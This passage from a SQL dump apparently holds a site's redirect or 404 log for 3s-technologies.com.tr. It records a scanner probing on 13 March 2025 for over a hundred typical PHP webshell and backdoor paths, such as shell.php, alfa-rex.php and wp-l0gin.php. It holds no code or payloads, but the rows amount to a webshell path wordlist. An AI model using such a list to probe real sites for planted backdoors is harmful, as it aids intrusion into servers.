00:00:00',301),(38094,'https://3s-technologies.com.tr/tr/ans.php',NULL,'https://3s-technologies.com.tr//ans.php','',2,0,'2025-03-13 23:43:12','0000-00-00 00:00:00',301),(38095,'https://3s-technologies.com.tr/tr/buy.php',NULL,'https://3s-technologies.com.tr//buy.php','',2,0,'2025-03-13 23:43:12','0000-00-00 00:00:00',301),(38096,'https://3s-technologies.com.tr/tr/wp-content/plugins/core-econx/up.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/Core-EconX/up.php','',2,0,'2025-03-13 23:43:13','0000-00-00 00:00:00',301),(38097,'https://3s-technologies.com.tr/tr/wp-content/termps.php',NULL,'https://3s-technologies.com.tr//wp-content/termps.php','',2,0,'2025-03-13 23:43:14','0000-00-00 00:00:00',301),(38098,'https://3s-technologies.com.tr/tr/pwp-admin/network/login.php',NULL,'https://3s-technologies.com.tr//pwp-admin/network/login.php','',2,0,'2025-03-13 23:43:15','0000-00-00 00:00:00',301),(38099,'https://3s-technologies.com.tr/tr/wander.php',NULL,'https://3s-technologies.com.tr//wander.php','',2,0,'2025-03-13 23:43:15','0000-00-00 00:00:00',301),(38100,'https://3s-technologies.com.tr/tr/wp-includes/css/about.php',NULL,'https://3s-technologies.com.tr//wp-includes/css/about.php','',2,0,'2025-03-13 23:43:16','0000-00-00 00:00:00',301),(38101,'https://3s-technologies.com.tr/tr/admin/function.php',NULL,'https://3s-technologies.com.tr//admin/function.php','',2,0,'2025-03-13 23:43:17','0000-00-00 00:00:00',301),(38102,'https://3s-technologies.com.tr/tr/wp-content/themes/deeto/login.php',NULL,'https://3s-technologies.com.tr//wp-content/themes/deeto/login.php','',2,0,'2025-03-13 23:43:18','0000-00-00 00:00:00',301),(38103,'https://3s-technologies.com.tr/tr/wp-includes/ixr/wp-login.php',NULL,'https://3s-technologies.com.tr//wp-includes/IXR/wp-login.php','',2,0,'2025-03-13 23:43:18','0000-00-00 00:00:00',301),(38104,'https://3s-technologies.com.tr/tr/.tmb/about.php',NULL,'https://3s-technologies.com.tr//.tmb/about.php','',2,0,'2025-03-13 23:43:19','0000-00-00 00:00:00',301),(38105,'https://3s-technologies.com.tr/tr/wp-content/themes/about.php',NULL,'https://3s-technologies.com.tr//wp-content/themes/about.php','',2,0,'2025-03-13 23:43:20','0000-00-00 00:00:00',301),(38106,'https://3s-technologies.com.tr/tr/wp-includes/images/about.php',NULL,'https://3s-technologies.com.tr//wp-includes/images/about.php','',2,0,'2025-03-13 23:43:21','0000-00-00 00:00:00',301),(38107,'https://3s-technologies.com.tr/tr/makeasmtp.php',NULL,'https://3s-technologies.com.tr//makeasmtp.php','',2,0,'2025-03-13 23:43:22','0000-00-00 00:00:00',301),(38108,'https://3s-technologies.com.tr/tr/mah/function.php',NULL,'https://3s-technologies.com.tr//mah/function.php','',2,0,'2025-03-13 23:43:23','0000-00-00 00:00:00',301),(38109,'https://3s-technologies.com.tr/tr/file.php',NULL,'https://3s-technologies.com.tr//file.php','',3,0,'2025-03-13 23:43:25','0000-00-00 00:00:00',301),(38110,'https://3s-technologies.com.tr/tr/mah.php',NULL,'https://3s-technologies.com.tr//mah.php','',2,0,'2025-03-13 23:43:27','0000-00-00 00:00:00',301),(38111,'https://3s-technologies.com.tr/tr/about.php',NULL,'https://3s-technologies.com.tr//about.php','',5,0,'2025-03-13 23:43:27','0000-00-00 00:00:00',301),(38112,'https://3s-technologies.com.tr/tr/index/function.php',NULL,'https://3s-technologies.com.tr//index/function.php','',4,0,'2025-03-13 23:43:28','0000-00-00 00:00:00',301),(38113,'https://3s-technologies.com.tr/tr/fm.php',NULL,'https://3s-technologies.com.tr//fm.php','',3,0,'2025-03-13 23:43:30','0000-00-00 00:00:00',301),(38114,'https://3s-technologies.com.tr/tr/wp-admin/js/index.php',NULL,'https://3s-technologies.com.tr//wp-admin/js/index.php','',2,0,'2025-03-13 23:43:31','0000-00-00 00:00:00',301),(38115,'https://3s-technologies.com.tr/tr/about/function.php',NULL,'https://3s-technologies.com.tr//about/function.php','',2,0,'2025-03-13 23:43:32','0000-00-00 00:00:00',301),(38116,'https://3s-technologies.com.tr/tr/alfa-rex.php',NULL,'https://3s-technologies.com.tr//alfa-rex.php','',2,0,'2025-03-13 23:43:32','0000-00-00 00:00:00',301),(38117,'https://3s-technologies.com.tr/tr/wp-content/plugins/core-plugin/include.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/core-plugin/include.php','',2,0,'2025-03-13 23:43:33','0000-00-00 00:00:00',301),(38118,'https://3s-technologies.com.tr/tr/moon.php',NULL,'https://3s-technologies.com.tr//moon.php','',2,0,'2025-03-13 23:43:34','0000-00-00 00:00:00',301),(38119,'https://3s-technologies.com.tr/tr/wp-content/index.php',NULL,'https://3s-technologies.com.tr//wp-content/index.php','',4,0,'2025-03-13 23:43:35','0000-00-00 00:00:00',301),(38120,'https://3s-technologies.com.tr/tr/wp-admin/network/index.php',NULL,'https://3s-technologies.com.tr//wp-admin/network/index.php','',2,0,'2025-03-13 23:43:36','0000-00-00 00:00:00',301),(38121,'https://3s-technologies.com.tr/tr/wp-admin/maint/index.php',NULL,'https://3s-technologies.com.tr//wp-admin/maint/index.php','',2,0,'2025-03-13 23:43:37','0000-00-00 00:00:00',301),(38122,'https://3s-technologies.com.tr/tr/blog/index.php',NULL,'https://3s-technologies.com.tr//blog/index.php','',2,0,'2025-03-13 23:43:38','0000-00-00 00:00:00',301),(38123,'https://3s-technologies.com.tr/tr/xml.php',NULL,'https://3s-technologies.com.tr//xml.php','',2,0,'2025-03-13 23:43:39','0000-00-00 00:00:00',301),(38124,'https://3s-technologies.com.tr/tr/jindex.php',NULL,'https://3s-technologies.com.tr//jindex.php','',2,0,'2025-03-13 23:43:40','0000-00-00 00:00:00',301),(38125,'https://3s-technologies.com.tr/tr/.well-known/index.php',NULL,'https://3s-technologies.com.tr//.well-known/index.php','',2,0,'2025-03-13 23:43:41','0000-00-00 00:00:00',301),(38126,'https://3s-technologies.com.tr/tr/wp-content/uploads/index.php',NULL,'https://3s-technologies.com.tr//wp-content/uploads/index.php','',3,0,'2025-03-13 23:43:42','0000-00-00 00:00:00',301),(38127,'https://3s-technologies.com.tr/tr/wp-content/plugins/index.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/index.php','',3,0,'2025-03-13 23:43:42','0000-00-00 00:00:00',301),(38128,'https://3s-technologies.com.tr/tr/ini.php',NULL,'https://3s-technologies.com.tr//ini.php','',2,0,'2025-03-13 23:43:44','0000-00-00 00:00:00',301),(38129,'https://3s-technologies.com.tr/tr/themes.php',NULL,'https://3s-technologies.com.tr//themes.php','',2,0,'2025-03-13 23:43:45','0000-00-00 00:00:00',301),(38130,'https://3s-technologies.com.tr/tr/install.php',NULL,'https://3s-technologies.com.tr//install.php','',2,0,'2025-03-13 23:43:46','0000-00-00 00:00:00',301),(38131,'https://3s-technologies.com.tr/tr/wp-includes/css/index.php',NULL,'https://3s-technologies.com.tr//wp-includes/css/index.php','',2,0,'2025-03-13 23:43:46','0000-00-00 00:00:00',301),(38132,'https://3s-technologies.com.tr/tr/.well-known/pki-validation/moon.php',NULL,'https://3s-technologies.com.tr//.well-known/pki-validation/moon.php','',2,0,'2025-03-13 23:43:47','0000-00-00 00:00:00',301),(38133,'https://3s-technologies.com.tr/tr/classwithtostring.php',NULL,'https://3s-technologies.com.tr//classwithtostring.php','',4,0,'2025-03-13 23:43:48','0000-00-00 00:00:00',301),(38134,'https://3s-technologies.com.tr/tr/wp-includes/id3/index.php',NULL,'https://3s-technologies.com.tr//wp-includes/ID3/index.php','',3,0,'2025-03-13 23:43:49','0000-00-00 00:00:00',301),(38135,'https://3s-technologies.com.tr/tr/goods.php',NULL,'https://3s-technologies.com.tr//goods.php','',3,0,'2025-03-13 23:43:50','0000-00-00 00:00:00',301),(38136,'https://3s-technologies.com.tr/tr/wp-admin/images/index.php',NULL,'https://3s-technologies.com.tr//wp-admin/images/index.php','',2,0,'2025-03-13 23:43:50','0000-00-00 00:00:00',301),(38137,'https://3s-technologies.com.tr/tr/wp-links.php',NULL,'https://3s-technologies.com.tr//wp-links.php','',2,0,'2025-03-13 23:43:51','0000-00-00 00:00:00',301),(38138,'https://3s-technologies.com.tr/tr/wp-content/languages/wp-login.php',NULL,'https://3s-technologies.com.tr//wp-content/languages/wp-login.php','',2,0,'2025-03-13 23:43:53','0000-00-00 00:00:00',301),(38139,'https://3s-technologies.com.tr/tr/elp.php',NULL,'https://3s-technologies.com.tr//elp.php','',2,0,'2025-03-13 23:43:54','0000-00-00 00:00:00',301),(38140,'https://3s-technologies.com.tr/tr/wp-includes/product.php',NULL,'https://3s-technologies.com.tr//wp-includes/product.php','',2,0,'2025-03-13 23:43:56','0000-00-00 00:00:00',301),(38141,'https://3s-technologies.com.tr/tr/wp-content/admin.php',NULL,'https://3s-technologies.com.tr//wp-content/admin.php','',4,0,'2025-03-13 23:43:57','0000-00-00 00:00:00',301),(38142,'https://3s-technologies.com.tr/tr/wp-admin/images/about.php',NULL,'https://3s-technologies.com.tr//wp-admin/images/about.php','',2,0,'2025-03-13 23:43:58','0000-00-00 00:00:00',301),(38143,'https://3s-technologies.com.tr/tr/log.php',NULL,'https://3s-technologies.com.tr//log.php','',2,0,'2025-03-13 23:43:59','0000-00-00 00:00:00',301),(38144,'https://3s-technologies.com.tr/tr/inc.php',NULL,'https://3s-technologies.com.tr//inc.php','',2,0,'2025-03-13 23:43:59','0000-00-00 00:00:00',301),(38145,'https://3s-technologies.com.tr/tr/wp-admin/css/index.php',NULL,'https://3s-technologies.com.tr//wp-admin/css/index.php','',2,0,'2025-03-13 23:44:00','0000-00-00 00:00:00',301),(38146,'https://3s-technologies.com.tr/tr/wp-conflg.php',NULL,'https://3s-technologies.com.tr//wp-conflg.php','',2,0,'2025-03-13 23:44:01','0000-00-00 00:00:00',301),(38147,'https://3s-technologies.com.tr/tr/cong.php',NULL,'https://3s-technologies.com.tr//cong.php','',2,0,'2025-03-13 23:44:02','0000-00-00 00:00:00',301),(38148,'https://3s-technologies.com.tr/tr/wp-content/themes/seotheme/mar.php',NULL,'https://3s-technologies.com.tr//wp-content/themes/seotheme/mar.php','',2,0,'2025-03-13 23:44:03','0000-00-00 00:00:00',301),(38149,'https://3s-technologies.com.tr/tr/wp-info.php',NULL,'https://3s-technologies.com.tr//wp-info.php','',2,0,'2025-03-13 23:44:04','0000-00-00 00:00:00',301),(38150,'https://3s-technologies.com.tr/tr/wp-content/languages/index.php',NULL,'https://3s-technologies.com.tr//wp-content/languages/index.php','',3,0,'2025-03-13 23:44:04','0000-00-00 00:00:00',301),(38151,'https://3s-technologies.com.tr/tr/edit.php',NULL,'https://3s-technologies.com.tr//edit.php','',2,0,'2025-03-13 23:44:05','0000-00-00 00:00:00',301),(38152,'https://3s-technologies.com.tr/tr/wp-includes/simplepie/index.php',NULL,'https://3s-technologies.com.tr//wp-includes/SimplePie/index.php','',2,0,'2025-03-13 23:44:07','0000-00-00 00:00:00',301),(38153,'https://3s-technologies.com.tr/tr/text.php',NULL,'https://3s-technologies.com.tr//text.php','',2,0,'2025-03-13 23:44:08','0000-00-00 00:00:00',301),(38154,'https://3s-technologies.com.tr/tr/wp-includes/assets/index.php',NULL,'https://3s-technologies.com.tr//wp-includes/assets/index.php','',2,0,'2025-03-13 23:44:09','0000-00-00 00:00:00',301),(38155,'https://3s-technologies.com.tr/tr/wp-includes/js/index.php',NULL,'https://3s-technologies.com.tr//wp-includes/js/index.php','',2,0,'2025-03-13 23:44:10','0000-00-00 00:00:00',301),(38156,'https://3s-technologies.com.tr/tr/dropdown.php',NULL,'https://3s-technologies.com.tr//dropdown.php','',4,0,'2025-03-13 23:44:11','0000-00-00 00:00:00',301),(38157,'https://3s-technologies.com.tr/tr/.well-known/pki-validation/index.php',NULL,'https://3s-technologies.com.tr//.well-known/pki-validation/index.php','',2,0,'2025-03-13 23:44:12','0000-00-00 00:00:00',301),(38158,'https://3s-technologies.com.tr/tr/wp-includes/customize/index.php',NULL,'https://3s-technologies.com.tr//wp-includes/customize/index.php','',2,0,'2025-03-13 23:44:14','0000-00-00 00:00:00',301),(38159,'https://3s-technologies.com.tr/tr/css.php',NULL,'https://3s-technologies.com.tr//css.php','',2,0,'2025-03-13 23:44:14','0000-00-00 00:00:00',301),(38160,'https://3s-technologies.com.tr/tr/wp-content/plugins/hello.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/hello.php','',2,0,'2025-03-13 23:44:15','0000-00-00 00:00:00',301),(38161,'https://3s-technologies.com.tr/tr/function.php',NULL,'https://3s-technologies.com.tr//function.php','',2,0,'2025-03-13 23:44:16','0000-00-00 00:00:00',301),(38162,'https://3s-technologies.com.tr/tr/randkeyword.php',NULL,'https://3s-technologies.com.tr//randkeyword.php','',2,0,'2025-03-13 23:44:16','0000-00-00 00:00:00',301),(38163,'https://3s-technologies.com.tr/tr/wp-includes/fonts/index.php',NULL,'https://3s-technologies.com.tr//wp-includes/fonts/index.php','',2,0,'2025-03-13 23:44:17','0000-00-00 00:00:00',301),(38164,'https://3s-technologies.com.tr/tr/plugin.php',NULL,'https://3s-technologies.com.tr//plugin.php','',2,0,'2025-03-13 23:44:18','0000-00-00 00:00:00',301),(38165,'https://3s-technologies.com.tr/tr/wp-includes/text/wp-login.php',NULL,'https://3s-technologies.com.tr//wp-includes/Text/wp-login.php','',2,0,'2025-03-13 23:44:18','0000-00-00 00:00:00',301),(38166,'https://3s-technologies.com.tr/tr/link.php',NULL,'https://3s-technologies.com.tr//link.php','',2,0,'2025-03-13 23:44:19','0000-00-00 00:00:00',301),(38167,'https://3s-technologies.com.tr/tr/wp-includes/fonts/about.php',NULL,'https://3s-technologies.com.tr//wp-includes/fonts/about.php','',2,0,'2025-03-13 23:44:21','0000-00-00 00:00:00',301),(38168,'https://3s-technologies.com.tr/tr/wp-includes/admin.php',NULL,'https://3s-technologies.com.tr//wp-includes/admin.php','',2,0,'2025-03-13 23:44:21','0000-00-00 00:00:00',301),(38169,'https://3s-technologies.com.tr/tr/defaults.php',NULL,'https://3s-technologies.com.tr//defaults.php','',2,0,'2025-03-13 23:44:22','0000-00-00 00:00:00',301),(38170,'https://3s-technologies.com.tr/tr/user.php',NULL,'https://3s-technologies.com.tr//user.php','',2,0,'2025-03-13 23:44:23','0000-00-00 00:00:00',301),(38171,'https://3s-technologies.com.tr/tr/wp-config-sample.php',NULL,'https://3s-technologies.com.tr//wp-config-sample.php','',2,0,'2025-03-13 23:44:24','0000-00-00 00:00:00',301),(38172,'https://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/index.php',NULL,'https://3s-technologies.com.tr//wp-admin/css/colors/blue/index.php','',2,0,'2025-03-13 23:44:25','0000-00-00 00:00:00',301),(38173,'https://3s-technologies.com.tr/tr/wp-content/mah.php',NULL,'https://3s-technologies.com.tr//wp-content/mah.php','',2,0,'2025-03-13 23:44:26','0000-00-00 00:00:00',301),(38174,'https://3s-technologies.com.tr/tr/x/index.php',NULL,'https://3s-technologies.com.tr//x/index.php','',2,0,'2025-03-13 23:44:27','0000-00-00 00:00:00',301),(38175,'https://3s-technologies.com.tr/tr/wp-includes/mah.php',NULL,'https://3s-technologies.com.tr//wp-includes/mah.php','',2,0,'2025-03-13 23:44:29','0000-00-00 00:00:00',301),(38176,'https://3s-technologies.com.tr/tr/wp-content/shell.php',NULL,'https://3s-technologies.com.tr//wp-content/shell.php','',2,0,'2025-03-13 23:44:30','0000-00-00 00:00:00',301),(38177,'https://3s-technologies.com.tr/tr/wp-includes/rest-api/index.php',NULL,'https://3s-technologies.com.tr//wp-includes/rest-api/index.php','',2,0,'2025-03-13 23:44:30','0000-00-00 00:00:00',301),(38178,'https://3s-technologies.com.tr/tr/menu.php',NULL,'https://3s-technologies.com.tr//menu.php','',2,0,'2025-03-13 23:44:31','0000-00-00 00:00:00',301),(38179,'https://3s-technologies.com.tr/tr/lock.php',NULL,'https://3s-technologies.com.tr//lock.php','',2,0,'2025-03-13 23:44:33','0000-00-00 00:00:00',301),(38180,'https://3s-technologies.com.tr/tr/wp-header.php',NULL,'https://3s-technologies.com.tr//wp-header.php','',2,0,'2025-03-13 23:44:33','0000-00-00 00:00:00',301),(38181,'https://3s-technologies.com.tr/tr/randkeyword.php7',NULL,'https://3s-technologies.com.tr//randkeyword.PhP7','',2,0,'2025-03-13 23:44:35','0000-00-00 00:00:00',301),(38182,'https://3s-technologies.com.tr/tr/hehehehe.php',NULL,'https://3s-technologies.com.tr//hehehehe.php','',2,0,'2025-03-13 23:44:37','0000-00-00 00:00:00',301),(38183,'https://3s-technologies.com.tr/tr/wp-includes/wp-login.php',NULL,'https://3s-technologies.com.tr//wp-includes/wp-login.php','',2,0,'2025-03-13 23:44:37','0000-00-00 00:00:00',301),(38184,'https://3s-technologies.com.tr/tr/cgi-bin/wp-login.php',NULL,'https://3s-technologies.com.tr//cgi-bin/wp-login.php','',1,0,'2025-03-13 23:44:38','0000-00-00 00:00:00',301),(38185,'https://3s-technologies.com.tr/tr/wp-admin/css/colors/index.php',NULL,'https://3s-technologies.com.tr//wp-admin/css/colors/index.php','',2,0,'2025-03-13 23:44:40','0000-00-00 00:00:00',301),(38186,'https://3s-technologies.com.tr/tr/worksec.php',NULL,'https://3s-technologies.com.tr//worksec.php','',3,0,'2025-03-13 23:44:45','0000-00-00 00:00:00',301),(38187,'https://3s-technologies.com.tr/tr/ioxi002.php7',NULL,'https://3s-technologies.com.tr//ioxi002.PhP7','',2,0,'2025-03-13 23:44:46','0000-00-00 00:00:00',301),(38188,'https://3s-technologies.com.tr/tr/wp-admin/network/about.php',NULL,'https://3s-technologies.com.tr//wp-admin/network/about.php','',2,0,'2025-03-13 23:44:47','0000-00-00 00:00:00',301),(38189,'https://3s-technologies.com.tr/tr/back.php',NULL,'https://3s-technologies.com.tr//back.php','',2,0,'2025-03-13 23:44:48','0000-00-00 00:00:00',301),(38190,'https://3s-technologies.com.tr/tr/.well-known/about.php',NULL,'https://3s-technologies.com.tr//.well-known/about.php','',2,0,'2025-03-13 23:44:49','0000-00-00 00:00:00',301),(38191,'https://3s-technologies.com.tr/tr/plugins.php',NULL,'https://3s-technologies.com.tr//plugins.php','',2,0,'2025-03-13 23:44:50','0000-00-00 00:00:00',301),(38192,'https://3s-technologies.com.tr/tr/wp-content/about.php',NULL,'https://3s-technologies.com.tr//wp-content/about.php','',2,0,'2025-03-13 23:44:50','0000-00-00 00:00:00',301),(38193,'https://3s-technologies.com.tr/tr/class.api.php',NULL,'https://3s-technologies.com.tr//class.api.php','',2,0,'2025-03-13 23:44:51','0000-00-00 00:00:00',301),(38194,'https://3s-technologies.com.tr/tr/baxa1.php',NULL,'https://3s-technologies.com.tr//baxa1.php','',2,0,'2025-03-13 23:44:52','0000-00-00 00:00:00',301),(38195,'https://3s-technologies.com.tr/tr/wp-includes/simplepie/about.php',NULL,'https://3s-technologies.com.tr//wp-includes/SimplePie/about.php','',2,0,'2025-03-13 23:44:52','0000-00-00 00:00:00',301),(38196,'https://3s-technologies.com.tr/tr/wp-includes/sitemaps/about.php',NULL,'https://3s-technologies.com.tr//wp-includes/sitemaps/about.php','',2,0,'2025-03-13 23:44:53','0000-00-00 00:00:00',301),(38197,'https://3s-technologies.com.tr/tr/.well-known/acme-challenge/about.php',NULL,'https://3s-technologies.com.tr//.well-known/acme-challenge/about.php','',2,0,'2025-03-13 23:44:54','0000-00-00 00:00:00',301),(38198,'https://3s-technologies.com.tr/tr/ova.php',NULL,'https://3s-technologies.com.tr//ova.php','',2,0,'2025-03-13 23:44:55','0000-00-00 00:00:00',301),(38199,'https://3s-technologies.com.tr/tr/wp-content/item.php',NULL,'https://3s-technologies.com.tr//wp-content/item.php','',2,0,'2025-03-13 23:44:55','0000-00-00 00:00:00',301),(38200,'https://3s-technologies.com.tr/tr/wp-content/classwithtostring.php',NULL,'https://3s-technologies.com.tr//wp-content/classwithtostring.php','',2,0,'2025-03-13 23:44:56','0000-00-00 00:00:00',301),(38201,'https://3s-technologies.com.tr/tr/wp-admin/css/about.php',NULL,'https://3s-technologies.com.tr//wp-admin/css/about.php','',2,0,'2025-03-13 23:44:57','0000-00-00 00:00:00',301),(38202,'https://3s-technologies.com.tr/tr/wp-includes/item.php',NULL,'https://3s-technologies.com.tr//wp-includes/item.php','',2,0,'2025-03-13 23:44:58','0000-00-00 00:00:00',301),(38203,'https://3s-technologies.com.tr/tr/wp-admin/network/admin.php',NULL,'https://3s-technologies.com.tr//wp-admin/network/admin.php','',2,0,'2025-03-13 23:44:59','0000-00-00 00:00:00',301),(38204,'https://3s-technologies.com.tr/tr/wp-content/cong.php',NULL,'https://3s-technologies.com.tr//wp-content/cong.php','',2,0,'2025-03-13 23:45:00','0000-00-00 00:00:00',301),(38205,'https://3s-technologies.com.tr/tr/wp-content/themes/digital-download/new.php',NULL,'https://3s-technologies.com.tr//wp-content/themes/digital-download/new.php','',2,0,'2025-03-13 23:45:01','0000-00-00 00:00:00',301),(38206,'https://3s-technologies.com.tr/tr/wp-admin/images/admin.php',NULL,'https://3s-technologies.com.tr//wp-admin/images/admin.php','',2,0,'2025-03-13 23:45:02','0000-00-00 00:00:00',301),(38207,'https://3s-technologies.com.tr/tr/byp.php',NULL,'https://3s-technologies.com.tr//byp.php','',2,0,'2025-03-13 23:45:03','0000-00-00 00:00:00',301),(38208,'https://3s-technologies.com.tr/tr/wp-admin/css/colors/about.php',NULL,'https://3s-technologies.com.tr//wp-admin/css/colors/about.php','',2,0,'2025-03-13 23:45:04','0000-00-00 00:00:00',301),(38209,'https://3s-technologies.com.tr/tr/wp-includes/customize/about.php',NULL,'https://3s-technologies.com.tr//wp-includes/customize/about.php','',2,0,'2025-03-13 23:45:05','0000-00-00 00:00:00',301),(38210,'https://3s-technologies.com.tr/tr/wp-admin/wp-login.php',NULL,'https://3s-technologies.com.tr//wp-admin/wp-login.php','',2,0,'2025-03-13 23:45:06','0000-00-00 00:00:00',301),(38211,'https://3s-technologies.com.tr/tr/.well-known/acme-challenge/upfile.php',NULL,'https://3s-technologies.com.tr//.well-known/acme-challenge/upfile.php','',2,0,'2025-03-13 23:45:06','0000-00-00 00:00:00',301),(38212,'https://3s-technologies.com.tr/tr/wp-content/themes/include.php',NULL,'https://3s-technologies.com.tr//wp-content/themes/include.php','',2,0,'2025-03-13 23:45:07','0000-00-00 00:00:00',301),(38213,'https://3s-technologies.com.tr/tr/wp-admin/classwithtostring.php',NULL,'https://3s-technologies.com.tr//wp-admin/classwithtostring.php','',2,0,'2025-03-13 23:45:08','0000-00-00 00:00:00',301),(38214,'https://3s-technologies.com.tr/tr/wp-content/plugins/wordpresscore/index.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/WordPressCore/index.php','',2,0,'2025-03-13 23:45:09','0000-00-00 00:00:00',301),(38215,'https://3s-technologies.com.tr/tr/ova-tools.php',NULL,'https://3s-technologies.com.tr//ova-tools.php','',2,0,'2025-03-13 23:45:09','0000-00-00 00:00:00',301),(38216,'https://3s-technologies.com.tr/tr/version.php',NULL,'https://3s-technologies.com.tr//version.php','',2,0,'2025-03-13 23:45:10','0000-00-00 00:00:00',301),(38217,'https://3s-technologies.com.tr/tr/lufix.php',NULL,'https://3s-technologies.com.tr//lufix.php','',2,0,'2025-03-13 23:45:11','0000-00-00 00:00:00',301),(38218,'https://3s-technologies.com.tr/tr/wp-includes/images/wp-login.php',NULL,'https://3s-technologies.com.tr//wp-includes/images/wp-login.php','',2,0,'2025-03-13 23:45:12','0000-00-00 00:00:00',301),(38219,'https://3s-technologies.com.tr/tr/wp-includes/pomo/wp-login.php',NULL,'https://3s-technologies.com.tr//wp-includes/pomo/wp-login.php','',2,0,'2025-03-13 23:45:13','0000-00-00 00:00:00',301),(38220,'https://3s-technologies.com.tr/tr/wp-admin/user/index.php',NULL,'https://3s-technologies.com.tr//wp-admin/user/index.php','',2,0,'2025-03-13 23:45:13','0000-00-00 00:00:00',301),(38221,'https://3s-technologies.com.tr/tr/wp-content/themes.php',NULL,'https://3s-technologies.com.tr//wp-content/themes.php','',2,0,'2025-03-13 23:45:14','0000-00-00 00:00:00',301),(38222,'https://3s-technologies.com.tr/tr/wp-content/uploads/about.php',NULL,'https://3s-technologies.com.tr//wp-content/uploads/about.php','',2,0,'2025-03-13 23:45:15','0000-00-00 00:00:00',301),(38223,'https://3s-technologies.com.tr/tr/wp-includes/link.php',NULL,'https://3s-technologies.com.tr//wp-includes/link.php','',2,0,'2025-03-13 23:45:16','0000-00-00 00:00:00',301),(38224,'https://3s-technologies.com.tr/tr/wp-content/plugins/dummyyummy/wp-signup.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/dummyyummy/wp-signup.php','',2,0,'2025-03-13 23:45:17','0000-00-00 00:00:00',301),(38225,'https://3s-technologies.com.tr/tr/wp-add.php',NULL,'https://3s-technologies.com.tr//wp-add.php','',2,0,'2025-03-13 23:45:19','0000-00-00 00:00:00',301),(38226,'https://3s-technologies.com.tr/tr/wp-admin/about.php',NULL,'https://3s-technologies.com.tr//wp-admin/about.php','',2,0,'2025-03-13 23:45:20','0000-00-00 00:00:00',301),(38227,'https://3s-technologies.com.tr/tr/templates/beez/jsstrings.php',NULL,'https://3s-technologies.com.tr//templates/beez/jsstrings.php','',2,0,'2025-03-13 23:45:21','0000-00-00 00:00:00',301),(38228,'https://3s-technologies.com.tr/tr/wp-signup.php',NULL,'https://3s-technologies.com.tr//wp-signup.php','',2,0,'2025-03-13 23:45:21','0000-00-00 00:00:00',301),(38229,'https://3s-technologies.com.tr/tr/xl2023.php',NULL,'https://3s-technologies.com.tr//xl2023.php','',4,0,'2025-03-13 23:45:22','0000-00-00 00:00:00',301),(38230,'https://3s-technologies.com.tr/tr/wp-l0gin.php',NULL,'https://3s-technologies.com.tr//wp-l0gin.php','',2,0,'2025-03-13 23:45:24','0000-00-00 00:00:00',301),(38231,'https://3s-technologies.com.tr/tr/wp-admin/dropdown.php',NULL,'https://3s-technologies.com.tr//wp-admin/dropdown.php','',2,0,'2025-03-13 23:45:26','0000-00-00 00:00:00',301),(38232,'https://3s-technologies.com.tr/tr/assets/library.php',NULL,'https://3s-technologies.com.tr//assets/library.php','',2,0,'2025-03-13 23:45:27','0000-00-00 00:00:00',301),(38233,'https://3s-technologies.com.tr/tr/504.php',NULL,'https://3s-technologies.com.tr//504.php','',2,0,'2025-03-13 23:45:28','0000-00-00 00:00:00',301),(38234,'https://3s-technologies.com.tr/tr/wp-admin/css/network.php',NULL,'https://3s-technologies.com.tr//wp-admin/css/network.php','',2,0,'2025-03-13 23:45:29','0000-00-00 00:00:00',301),(38235,'https://3s-technologies.com.tr/tr/wp-content/content.php',NULL,'https://3s-technologies.com.tr//wp-content/content.php','',2,0,'2025-03-13 23:45:29','0000-00-00 00:00:00',301),(38236,'https://3s-technologies.com.tr/tr/wp-admin/admin.php',NULL,'https://3s-technologies.com.tr//wp-admin/admin.php','',2,0,'2025-03-13 23:45:30','0000-00-00 00:00:00',301),(38237,'https://3s-technologies.com.tr/tr/wp-content/json.php',NULL,'https://3s-technologies.com.tr//wp-content/json.php','',2,0,'2025-03-13 23:45:31','0000-00-00 00:00:00',301),(38238,'https://3s-technologies.com.tr/tr/wp-includes/id3/about.php',NULL,'https://3s-technologies.com.tr//wp-includes/ID3/about.php','',2,0,'2025-03-13 23:45:32','0000-00-00 00:00:00',301),(38239,'https://3s-technologies.com.tr/tr/tiny.php',NULL,'https://3s-technologies.com.tr//tiny.php','',2,0,'2025-03-13 23:45:32','0000-00-00 00:00:00',301),(38240,'https://3s-technologies.com.tr/tr/jp.php',NULL,'https://3s-technologies.com.tr//jp.php','',2,0,'2025-03-13 23:45:33','0000-00-00 00:00:00',301),(38241,'https://3s-technologies.com.tr/tr/wp-includes/fonts/wp-login.php',NULL,'https://3s-technologies.com.tr//wp-includes/fonts/wp-login.php','',2,0,'2025-03-13 23:45:34','0000-00-00 00:00:00',301),(38242,'https://3s-technologies.com.tr/tr/wp-admin/js/about.php',NULL,'https://3s-technologies.com.tr//wp-admin/js/about.php','',2,0,'2025-03-13 23:45:35','0000-00-00 00:00:00',301),(38243,'https://3s-technologies.com.tr/tr/wp-admin/network/wp-login.php',NULL,'https://3s-technologies.com.tr//wp-admin/network/wp-login.php','',2,0,'2025-03-13 23:45:36','0000-00-00 00:00:00',301),(38244,'https://3s-technologies.com.tr/tr/upgrade.php',NULL,'https://3s-technologies.com.tr//upgrade.php','',2,0,'2025-03-13 23:45:37','0000-00-00 00:00:00',301),(38245,'https://3s-technologies.com.tr/tr/wp-content/tmpls.php',NULL,'https://3s-technologies.com.tr//wp-content/tmpls.php','',2,0,'2025-03-13 23:45:38','0000-00-00 00:00:00',301),(38246,'https://3s-technologies.com.tr/tr/.well-known/pki-validation/about.php',NULL,'https://3s-technologies.com.tr//.well-known/pki-validation/about.php','',2,0,'2025-03-13 23:45:39','0000-00-00 00:00:00',301),(38247,'https://3s-technologies.com.tr/tr/editor.php',NULL,'https://3s-technologies.com.tr//editor.php','',2,0,'2025-03-13 23:45:39','0000-00-00 00:00:00',301),(38248,'https://3s-technologies.com.tr/tr/class.php',NULL,'https://3s-technologies.com.tr//class.php','',2,0,'2025-03-13 23:45:40','0000-00-00 00:00:00',301),(38249,'https://3s-technologies.com.tr/tr/vendor/bin/loader.php',NULL,'https://3s-technologies.com.tr//vendor/bin/loader.php','',2,0,'2025-03-13 23:45:41','0000-00-00 00:00:00',301),(38250,'https://3s-technologies.com.tr/tr/wp-includes/wp-includes_function.php',NULL,'https://3s-technologies.com.tr//wp-includes/wp-includes_function.php','',2,0,'2025-03-13 23:45:42','0000-00-00 